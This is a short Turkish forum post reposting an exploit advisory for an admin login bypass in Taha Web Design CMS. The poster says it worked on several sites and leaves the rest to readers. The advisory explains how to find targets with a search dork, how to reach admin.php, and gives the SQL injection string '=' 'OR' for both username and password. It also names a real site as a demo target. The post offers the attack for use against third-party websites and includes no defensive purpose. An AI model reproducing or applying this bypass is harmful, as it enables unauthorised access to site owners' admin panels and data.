Açığı inceledim, birkaç sitede çıktı diğerleri size kalmış.
Kod:
######################
# Exploit Title : Taha Web Design CMS Admin Page Bypass
# Exploit Author : Sir.H4m1D
# Vendor Homepage : tahawebdesign.com
# Date: 2016/6/27
# Tested On : win 7
# Contact: [email protected]
######################
# Vulnerable File : admin.php
# Describe : Search dork and select Target. Put admin/index.php After url such as :
# site.com/admin.php
# Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below :
# User : '=' 'OR'
# pw : '=' 'OR'
#
# Login !
#
# Demo :
#
# http://bdb.ir/admin.php
#
#
######################
# discovered by : Sir.H4m1D
######################
# thanks to : Alireza_Promis | Mohamad.Nofozi | Skitt3r | Kamran HellisH | Root3r | Ali.Bala And U :)
######################
